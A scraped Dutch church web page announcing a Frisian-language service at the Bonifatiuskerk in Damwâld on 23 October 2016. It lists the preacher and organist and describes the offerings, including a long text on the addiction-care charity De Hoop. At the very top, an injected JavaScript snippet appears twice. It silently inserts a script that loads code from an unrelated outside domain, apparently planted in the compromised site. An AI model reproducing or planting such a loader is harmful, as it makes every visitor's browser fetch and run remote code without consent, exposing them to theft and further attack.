;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 oktober 2016 9:30 uur - PKN Damwâld
zondag 23 oktober 2016
09:30 uur
Fryske tsjinst

Kerkdienst zondag 23 oktober 2016 9:30 uur

vg_-01

Informatie

Voorganger:Ds. J. Bakker, Stiens
Organist:Nienke van der Heide-Visser
Mededeling:Fryske tsjinst
Liturgie
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Vrienden van de Hoop

Stichting Vrienden van de Hoop:
In 1975 voelde een aantal christenen in Dordrecht zich erg betrokken bij het lot van verslaafden in hun samenleving. Gesteund door de plaatselijke kerken besloten zij een opvang voor deze kwetsbare doelgroep op te zetten. Een opvang genaamd: De Hoop. Inmiddels, veertig jaar later, is de opvang uitgegroeid tot een centrum waar op verschillende manieren geestelijke zorg wordt geboden. Een plek waar verslaafden en mensen met psychische problemen professionele hulp krijgen om te herstellen en hun leven weer opnieuw op te bouwen. Alle medewerkers bij De Hoop werken vanuit hun christelijke visie. Het geloof dat in Gods ogen ieder mens waardevol is en dat er voor iedereen genezing en herstel mogelijk is. Bijna 40 jaar na het begin van De Hoop is de steun en het gebed van kerken en vrienden nog even hard nodig. Uw steun, bemoediging en vriendschap zijn dus van harte welkom! De giften worden besteed aan de invulling van identiteit en pastoraat in de behandelingen, de werkervaringbedrijven, het inloophuis, de opvang van moeders met hun kinderen, de christelijke evenementen, de meer dan honderd voorlichtingen en levensverhalen die gedeeld worden via onder andere het blad HOOP en het programma Verhalen van Hoop.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds